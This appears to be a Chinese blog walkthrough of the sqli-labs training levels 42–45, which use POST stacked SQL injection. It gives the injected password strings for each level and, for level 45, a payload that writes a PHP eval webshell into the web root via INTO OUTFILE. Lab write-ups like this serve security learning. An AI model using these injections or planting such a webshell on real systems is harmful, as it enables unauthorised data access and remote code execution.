Less42-Less45(post型)

less42:  POST类型(注意:传参时候不能用--+    要用#即%23)使用''包裹

我们可以看到password没有经过mysqli_real_escape_string()函数进行处理,所以这个时候我们在这个位置进行构造

 

 

 

Admin  admin 登录

 

 

 

 

 

a

a';create table gxy42 like users;insert into gxy42 select *from users; #

虽然显示这个,但是我们看sql数据库,说明我们注入成功

 

 

 

 

 

 

 

 

 

Less43:  使用(‘’)包裹   其他与42关一致

通过查看login.php源码我们知道跟第42关区别就是用户名跟密码用(‘’)包裹,其余与第42关一样

 

 

 

a

a');create table gxy43 like users;insert into gxy43 select *from users; #

 

 

 

 

 

less-44:    使用’’包裹  其他与42关一致

没有回显信息    id=’1‘

 password构造语句:a';create table gxy44 like users;insert into gxy44 select *from users; #

 

 

less-45:   使用(‘’)包裹   其他与42关一致

没有回显信息  id=(’1‘)

 password构造语句:a');create table gxy45 like users;insert into gxy45 select *from users; #

 或者使用堆叠注入写入一句话木马配合中国菜刀进行注入

需要条件:

  1. 必须要有写权限
  2. 一句话木马
  3. Select xxx into outfile xxx
  4. 写入点

一句话木马   <?php @eval($_POST[crow]);?> 

写入路径  C:\\phpStudy\\WWW

最终结果 a’)  select ‘<?php @eval($_POST[crow]);?>’ into outfile ‘C:\\phpStudy\\WWW\\a.php’;#

 

 

 

 

posted @ 2020-02-07 14:50  gxy*  阅读(236)  评论(0编辑  收藏  举报